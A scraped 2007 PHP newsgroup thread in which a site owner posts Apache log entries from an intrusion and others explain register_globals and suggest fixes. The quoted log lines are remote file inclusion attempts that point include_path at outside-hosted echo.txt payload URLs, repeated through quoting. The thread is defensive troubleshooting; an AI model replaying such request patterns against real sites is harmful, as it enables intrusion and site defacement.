Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and lots
of entries where an "include_path" parameter was included in the URL of the
PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.
Can someone explain what adding "include_path" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
9  2391 
Charles Crume wrote:
Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and lots
of entries where an "include_path" parameter was included in the URL of the
PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.
Can someone explain what adding "include_path" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
The include_path itself in the url is just a variable. It's what you do
with it that's important. For instance, if you have register_globals
enabled, the include_path in the URL may override the system include_path.
Or, depending on what else you do in your code. This is a big reason
why it's good to use $_POST instead of $_REQUEST if you're posting a
form to a page - $_POST will ignore any $_GET parameters.
And just another reason to *ALWAYS* validate data coming from the user.
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp. js*******@attglobal.net
==================
Hi Jerry;
Thanks!!!
I am using an auction software package the *requires* register_globals to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).
I have turned register_globals off (of course the auction software no longer
works) until I figure out what to do.
Thanks again for your help!
Charles...
"Jerry Stuckle" <js*******@attglobal.netwrote in message
news:D7******************************@comcast.com. ..
Charles Crume wrote:
>Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and
lots of entries where an "include_path" parameter was included in the URL
of the PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a
code 404 as the culprits are obviously phising for pages, but requests
with return code 200 are showing a large number of bytes transferred --
far larger than the PHP page itself.
Can someone explain what adding "include_path" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
The include_path itself in the url is just a variable. It's what you do
with it that's important. For instance, if you have register_globals
enabled, the include_path in the URL may override the system include_path.
Or, depending on what else you do in your code. This is a big reason why
it's good to use $_POST instead of $_REQUEST if you're posting a form to a
page - $_POST will ignore any $_GET parameters.
And just another reason to *ALWAYS* validate data coming from the user.
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
js*******@attglobal.net
==================
Charles Crume wrote:
Hi Jerry;
Thanks!!!
I am using an auction software package the *requires* register_globals to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).
I have turned register_globals off (of course the auction software no longer
works) until I figure out what to do.
Thanks again for your help!
Charles...
"Jerry Stuckle" <js*******@attglobal.netwrote in message
news:D7******************************@comcast.com. ..
>Charles Crume wrote:
>>Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and
lots of entries where an "include_path" parameter was included in the URL
of the PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a
code 404 as the culprits are obviously phising for pages, but requests
with return code 200 are showing a large number of bytes transferred --
far larger than the PHP page itself.
Can someone explain what adding "include_path" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
The include_path itself in the url is just a variable. It's what you do
with it that's important. For instance, if you have register_globals
enabled, the include_path in the URL may override the system include_path.
Or, depending on what else you do in your code. This is a big reason why
it's good to use $_POST instead of $_REQUEST if you're posting a form to a
page - $_POST will ignore any $_GET parameters.
And just another reason to *ALWAYS* validate data coming from the user.
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
js*******@attglobal.net
==================
If your software is so old that it requires register_globals, it
probably has other security holes, also.
If they don't have an upgraded version, I'd suggest you find another
package. Otherwise, chances are you'll have this happen again.
Especially since they now know you're vulnerable.
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp. js*******@attglobal.net
==================
Charles Crume wrote:
Hi Jerry;
Thanks!!!
I am using an auction software package the *requires* register_globals to be
enabled. I took a look at my PHP.INI file and saw where I had changed this
setting years ago (had put some comments as to what, why, and when the
change was made in the file).
I have turned register_globals off (of course the auction software no longer
works) until I figure out what to do.
Thanks again for your help!
Charles...
And I forgot - please don't top post. Thanks.
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp. js*******@attglobal.net
==================
On Oct 14, 9:56 pm, "Charles Crume"
<NOccsS...@charlescrumesoftware.comwrote:
Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and lots
of entries where an "include_path" parameter was included in the URL of the
PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.
Can someone explain what adding "include_path" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
Hi,
I've been the target also of a hacker, with the same attack.
Add this to you script:
=====
$php_self = $_SERVER['PHP_SELF'];
if (($php_self == "/auction/includes/settings.inc.php") &&
(ini_get(register_globals))) {
$rg = array_keys($_REQUEST);
foreach($rg as $var)
{
if ($_REQUEST[$var] === $$var)
{
unset($$var);
exit;
}
}
}
=======
This will check if they are running the file, if register_globals is
enabled catch the parameters and unset them then halt the script.
So far it is working.
Jean
..oO(Charles Crume)
>I am using an auction software package the *requires* register_globals to be
enabled.
You shouldn't use it anymore and look for a better script, that doesn't
rely on insecure and deprecated features. register_globals is history
and will be completely dropped with PHP 6.
Micha
Hi Jean;
This has to be added to every script, correct? (If so, it would be too much
work and I would be better off to purchase newer auction software.)
I am also looking at use mod_rewrite in Apache to redirect any request with
"include_path" in it to a null page. Does anyone have thoughts on this
approach?
TIA.
Charles...
"Jean Gaudreau" <je***********@gmail.comwrote in message
news:11**********************@i13g2000prf.googlegr oups.com...
On Oct 14, 9:56 pm, "Charles Crume"
<NOccsS...@charlescrumesoftware.comwrote:
>Hello Everyone;
My site was hacked the other day -- someone was able to rename my
index.shtml file and put their own index.html file on my server. Not sure
how it was done, but looking through the log file, I found a lots and
lots
of entries where an "include_path" parameter was included in the URL of
the
PHP page, as shown below:
69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
/auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
/auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
HTTP/1.0" 200 75 "-" "Mozilla/5.0"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
/auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
404 310 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
/auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
/auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
I know how "include_path" works when *in* the PHP file, but I'm not sure
what the effect of including it in the URL. A number of entries show a
code
404 as the culprits are obviously phising for pages, but requests with
return code 200 are showing a large number of bytes transferred -- far
larger than the PHP page itself.
Can someone explain what adding "include_path" to a URL does?
Is there something I need to check on my server of how I've got Apache
configured?
TIA.
Charles...
Hi,
I've been the target also of a hacker, with the same attack.
Add this to you script:
=====
$php_self = $_SERVER['PHP_SELF'];
if (($php_self == "/auction/includes/settings.inc.php") &&
(ini_get(register_globals))) {
$rg = array_keys($_REQUEST);
foreach($rg as $var)
{
if ($_REQUEST[$var] === $$var)
{
unset($$var);
exit;
}
}
}
=======
This will check if they are running the file, if register_globals is
enabled catch the parameters and unset them then halt the script.
So far it is working.
Jean
I know... however this is easier said than done. Lot's of work to re-enter
customer info, sales info, items, etc.
Hopefully I will find another solution.
Thanks.
Charles...
"Michael Fesser" <ne*****@gmx.dewrote in message
news:c6********************************@4ax.com...
.oO(Charles Crume)
>>I am using an auction software package the *requires* register_globals to
be
enabled.
You shouldn't use it anymore and look for a better script, that doesn't
rely on insecure and deprecated features. register_globals is history
and will be completely dropped with PHP 6.
Micha
"Gary L. Burnore" <gb******@databasix.comwrote in message
news:ff**********@blackhelicopter.databasix.com...
On Wed, 17 Oct 2007 19:23:17 -0400, "Charles Crume"
<NO*******@charlescrumesoftware.comwrote:
>>I know... however this is easier said than done. Lot's of work to re-enter
customer info, sales info, items, etc.
Hopefully I will find another solution.
Thanks.
Charles...
What's with the recent rash of top posters?
Google noticed the activity in this group doubled - although, it's mostly
spam. This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics | |
by: Ziggi |
last post by:
Hi !
I have an ISAPI instalation of PHP over IIS5 server
on Windows 2000. Everything works fine but as I am
under website development I would like to keep
PHP error messages turned on - for my...
|
by: steve |
last post by:
I am quite frustrated with php’s include, as I have spent a ton of
time on it already... anyone can tell me why it was designed like this
(or something I don’t get)?
The path in include is...
|
by: Mxsmanic |
last post by:
The require() I'm using in a PHP script has stopped working after I
moved from PHP4 and Apache 1.3.x to PHP5 and Apache 2.x. Now I get
messages like this:
Warning:...
|
by: Brandons of mass destruction |
last post by:
I recently reconfigured open_basedir so that it wasn't quite so limited.
Now, I'm getting erros with php script that use to run fine, and I can't
figure out what went wrong.
Previously,...
|
by: Jim Carlock |
last post by:
I've set up the following using an Alias in Apache...
Alias /phpdocs/ "C:/Apache/htdocs/common/docs/php/"
<Directory "C:/Apache/htdocs/common/docs/php">
Options Indexes FollowSymlinks MultiViews...
| | |
by: s2s Paris |
last post by:
<<"failed to open stream no such directory or file>>
Avez vous trouve ? J'ai le meme genre de probleme en essayant
d'installer en local avec SuSE 10 apache2 php4 , il me semble qu'il
manque un...
|
by: laredotornado |
last post by:
Hi,
I'm using PHP 4.4.4 on Apache 2 on Fedora Core 5. PHP was installed
using Apache's apxs and the php library was installed to
/usr/local/php. However, when I set my "error_reporting"...
|
by: Paul |
last post by:
I am taking over an existing app and having trouble understanding their
references.
They have encapsulated Pear packages in the directory structure like:
/site
/site/html/Pear.php...
|
by: mejpark |
last post by:
Good afternoon PHPers,
This morning I downloaded "PHP Users" from sourceforge to implement a
user registration system. I followed the instructions in INSTALL.txt,
and successfully configured...
|
by: marktang |
last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
| | |
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers,...
|
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and...
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated ...
| | |
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
| |
